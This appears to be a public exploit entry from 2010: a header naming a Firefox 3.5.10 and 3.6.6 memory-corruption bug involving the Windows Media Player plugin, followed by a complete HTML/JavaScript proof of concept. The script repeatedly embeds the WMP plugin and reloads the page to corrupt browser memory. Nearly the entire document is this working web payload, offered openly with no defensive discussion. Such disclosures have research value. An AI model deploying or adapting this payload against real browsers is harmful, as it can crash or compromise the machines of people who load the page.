Source: http://code.google.com/p/skylined/issues/detail?id=21
# Exploit Title: Firefox 3.5.10 & 3.6.6 WMP Memory Corruption Using Popups
# Date: 2010-10-13
# Author: berendjanwever
# Version: FF 3.5.10 & 3.6.6 with WMP 10 & 11
# Tested on: Windows XP sp3
<HTML>
<HEAD>
<SCRIPT>
function go() {
var oWMP = document.getElementById("WMP");
if (oWMP) {
location.reload();
} else {
var oWrapper = document.getElementById("wrapper");
oWrapper.innerHTML = '<EMBED id="WMP" type="application/x-mplayer2" autostart=1 src="repro-firefox.html"></EMBED>';
setTimeout(go, 1000);
}
}
</SCRIPT>
</HEAD>
<BODY onload="go()">
<SPAN id="wrapper"></SPAN>
</BODY>
</HTML>